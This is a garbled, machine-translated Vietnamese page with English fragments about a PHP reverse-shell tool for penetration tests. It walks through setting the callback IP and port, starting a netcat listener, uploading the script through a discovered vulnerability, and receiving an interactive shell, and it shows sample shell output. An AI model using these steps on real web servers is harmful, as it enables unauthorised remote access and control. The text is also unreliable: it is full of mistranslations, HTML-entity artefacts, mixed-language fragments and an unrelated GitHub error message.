Hướng dẫn what is php reverse shell? - shell đảo ngược php là gì?

Công cụ này được thiết kế cho những tình huống đó trong thời gian Pentest nơi bạn có quyền truy cập tải lên vào máy chủ web mà chạy php. & Nbsp; Tải tập lệnh này lên một nơi nào đó trong Root Web sau đó chạy nó bằng cách truy cập URL thích hợp trong trình duyệt của bạn. & NBSP; Kịch bản sẽ mở kết nối TCP bên ngoài từ máy chủ web đến máy chủ và cổng bạn chọn. & NBSP; Bị ràng buộc với kết nối TCP này sẽ là một vỏ.

Đây sẽ là một shell tương tác thích hợp, trong đó bạn có thể chạy các chương trình giao tiếp như Telnet, SSH và Su. & NBSP; Nó khác với vỏ dựa trên biểu mẫu web cho phép bạn gửi một lệnh duy nhất, sau đó trả lại cho bạn đầu ra.

Tải xuống

php-reverse-shell-1.0.tar.gz

MD5sum:2bdf99cee7b302afdc45d1d51ac7e373

SHA1SUM: 30A26D5B5E30D819679E0D1EB44E46814892A4EE

Video

Tôi tình cờ thấy điều này & nbsp; video ai đó làm bằng php-rerseal-shell.

CẬP NHẬT 2011-11: IMAX đã gửi cho tôi một liên kết đến công cụ của anh ấy & nbsp; & nbsp; trông thật tuyệt.

Đi qua

Sửa đổi nguồn

Để ngăn người khác lạm dụng cửa sau của bạn - một kịch bản ác mộng trong khi bị dồn nén - bạn cần sửa đổi mã nguồn để cho biết nơi bạn muốn vỏ ngược lại ném trở lại. & NBSP; Chỉnh sửa các dòng sau của Php-rerseverse-shell.php:

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Sẵn sàng để bắt vỏ ngược

Bắt đầu trình nghe TCP trên máy chủ và cổng sẽ có thể truy cập bởi máy chủ web. & NBSP; Sử dụng cùng một cổng ở đây như bạn đã chỉ định trong tập lệnh (1234 trong ví dụ này):

$ nc -v -n -l -p 1234

Tải lên và chạy tập lệnh

Sử dụng bất kỳ lỗ hổng nào mà bạn đã phát hiện ra trong trang web, tải lên php-rerseverse-shell.php. & Nbsp; Chạy tập lệnh chỉ bằng cách duyệt đến tệp mới được tải lên trong trình duyệt web của bạn (NB: Bạn đã giành được bất kỳ đầu ra nào trên trang web, nó sẽ chỉ treo nếu thành công):

http://somesite/php-reverse-shell.php

Thưởng thức vỏ mới của bạn

Nếu mọi việc suôn sẻ, máy chủ web nên ném lại vỏ cho trình nghe NetCat của bạn. & NBSP; Một số thương mại hữu ích như W, uname -a, id và pwd được chạy tự động cho bạn:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58012
Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux
 16:59:28 up 39 days, 19:54,  2 users,  load average: 0.18, 0.13, 0.10
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root   :0        19May07 ?xdm?   5:10m  0.01s /bin/sh
uid=81(apache) gid=81(apache) groups=81(apache)
sh: no job control in this shell
sh-3.2$

Câu hỏi thường gặp

Khi nào điều này hữu ích?

Có lẽ các khu vực duy nhất trên đĩa mà bạn có quyền truy cập ghi được gắn với tùy chọn NoExec. & NBSP; Tải lên một chương trình được biên dịch sẽ không được sử dụng trong các tình huống này. & NBSP; Bạn cần sử dụng một ngôn ngữ kịch bản được cài đặt như Python, Perl, PHP, v.v. Có lẽ bạn chỉ có thể bị làm phiền khi tải lên chương trình thứ hai.
Perhaps you just can’t be bothered to upload a second program.

Có phải là kết nối shell sẽ bị cắt đứt khi máy chủ web hết lần sử dụng tập lệnh PHP?

Số & NBSP; Nó dường như không có trên các hệ thống mà tôi đã thử nghiệm nó trên (chỉ cho đến nay, Gentoo Linux). & NBSP; Ngoài ra, tập lệnh PHP cố gắng tự nâng cao và phân tách khỏi quá trình cha để tránh điều này (mặc dù nó hiếm khi hoạt động trong thực tế). & Nbsp; Trình duyệt của bạn sẽ xuất hiện để treo khi bạn truy cập vào vỏ ngược. & NBSP; Điều này là bình thường. & NBSP; Nó rất tốt để nhấn Hủy trong trình duyệt của bạn một khi bạn đã có vỏ của mình.

Có phải là một quy trình vỏ trông khá đáng ngờ khi quản trị viên chạy trên PS PS PS?

Vâng. & Nbsp; Phiên bản này của Shell Reverse rất tinh tế:

apache   28106  0.0  0.0  10428  1216 ?        S    17:15   0:00 sh -c uname -a; w; id; /bin/sh -i
apache   28110  0.0  0.0  10172  1428 ?        S    17:15   0:00 /bin/sh -i

Có phải trang này có sẵn trong Serbo-Croatia không?

Đúng. Cảm ơn Jovana Milutinovich đã dịch.

Hãy cẩn thận

Tường lửa ra ngoài (hay còn gọi là lọc ra) có thể ngăn chặn kết nối vỏ ngược của bạn đến với bạn. & NBSP; Chọn một cổng mà cho phép thông qua tường lửa. & NBSP; Nếu không có, bạn sẽ phải thực hiện với Shell PHP dựa trên biểu mẫu.

Việc triển khai cụ thể này của Shell ngược là dựa trên UNIX. & NBSP; Bạn cần phải sửa đổi nó trước khi nó hoạt động trên Windows.

Tôi đã nhận thấy một vài quá trình zombie trong khi thử nghiệm shell này. & Nbsp; Nó không phải lúc nào cũng xảy ra, nhưng có lẽ được mong đợi vì chúng tôi không tự làm phiền mình đúng.

Pentest, PHP, Reverseshell, công cụ

Vỏ web

Một thẻ đã tồn tại với tên chi nhánh được cung cấp. Nhiều lệnh GIT chấp nhận cả tên thẻ và tên chi nhánh, vì vậy việc tạo nhánh này có thể gây ra hành vi bất ngờ. Bạn có chắc là bạn muốn tạo chi nhánh này?

Tin tặc có thể làm gì với vỏ ngược?

Các cuộc tấn công đảo ngược xảy ra khi kẻ tấn công tạo ra một cửa hậu vào máy chủ thông qua một số phương tiện truy cập từ xa. Kẻ tấn công sử dụng cửa sau đó để có quyền truy cập vào máy chủ và thực thi các lệnh như thể chúng đã đăng nhập vào chính máy chủ. Tin tặc thực thi các cuộc tấn công đảo ngược bằng cách sử dụng Python, Java hoặc Node.gain access to the server and execute commands as if they were logged in on the server itself. Hackers execute reverse shell attacks using Python, Java, or Node.

Php Reverse Shell có hoạt động trên Windows không?

GitHub-IVAN-SINCEK/PHP-REVERSE-Shell: Php Shell hoạt động trên Linux OS, MacOS và Windows OS.work on Linux OS, macOS, and Windows OS.

Lệnh cho Shell Reverse là gì?

Netcat là một lệnh trong Linux được sử dụng để thực hiện nghe cổng, chuyển hướng cổng, kiểm tra cổng hoặc thậm chí kiểm tra mạng.Netcat cũng được gọi là một con dao của quân đội Thụy Sĩ gồm các công cụ kết nối mạng.Lệnh này cũng được sử dụng để tạo ra một vỏ ngược. is a command in Linux which is used to perform port listening, port redirection, port checking, or even network testing. Netcat is also called a swiss army knife of networking tools. This command is also used to create a reverse shell.

Vỏ liên kết và vỏ ngược là gì?

BIND SHELLS có người nghe chạy trên mục tiêu và kẻ tấn công kết nối với người nghe để có được quyền truy cập từ xa vào hệ thống đích.Trong vỏ ngược, kẻ tấn công có người nghe chạy trên máy của mình và mục tiêu kết nối với kẻ tấn công bằng vỏ.